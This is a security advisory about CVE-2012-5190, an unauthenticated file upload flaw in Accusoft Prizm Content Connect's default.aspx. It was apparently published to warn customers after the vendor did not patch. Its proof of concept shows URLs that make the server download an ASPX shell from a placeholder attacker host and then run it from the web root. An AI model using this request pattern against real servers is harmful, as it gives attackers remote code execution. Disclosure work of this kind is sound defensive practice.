Accusoft Prizm Content Connect Arbitrary File Upload and Code Execution

2013.01.10
Credit: Include Security Research
Risk: High
Local: No
Remote: Yes
CVE: CVE-2012-5190
CWE: CWE-434


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

In the course of our security assessment consulting we often find 0day vulnerabilities and report them to vendors. In this particular case the vendor has unfortunately shown a general disgregard for the security risk of this uncovered vulnerability which was originally disclosed privately to them on September 27th 2012. All original deadlines and even their own proposed fix dates have expired, as such we're releasing this advisory so that affected customers can update their WAF/IDS/IPS systems to protect themselves from this obvious vulnerability. We hope the Accusoft team addresses this vulnerability in a patch or upcoming release as soon as possible. This vulnerablity has been assigned CVE-2012-5190. Take care, Include Security Research Team Arbitrary File Upload and Execution in Prizm Content Connect default.aspx Prizm Content Connect web document viewer converts a variety of formats into Adobe Flash objects so that they can be viewed in a web browser. If Prizm Content Connect is configured according to the installation instructions, it will be vulnerable to arbitrary remote code execution. By default, the Prizm software includes a script called default.aspx which will accept a document parameter that is a remote URL. This script will download the remote document, save it to the server with an attacker-supplied filename extension, and reveal the path to the document on the local filesystem. Since, in the default configuration, the download path on the local filesystem resides within the web server’s web root, the attacker can cause default.aspx to download a malicious ASPX script and save it with a dangerous .aspx extension. The attacker can then request the ASPX script from the server, causing the server to execute possibly malicious code contained within. Vulnerable versions This vulnerability was discovered in the following version, but we anticipate other versions to be vulnerable as well: · Prizm Content Connect 5.1 Proof of concept First, the attacker causes the Prizm Content Connect software to download the malicious ASPX file: http://victim.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx The resulting page discloses the filename to which the ASPX file was downloaded, e.g.: Document Location: C:\Project\ Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx Temp Location: C:\tempcache\ The attacker then requests the ASPX shell from the root of the website: http://victim.example.com/ajwyfw45itxwys45fgzomrmv.aspx Assigned CVE# CVE-2012-5190

References:

http://seclists.org/fulldisclosure/2013/Jan/55


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top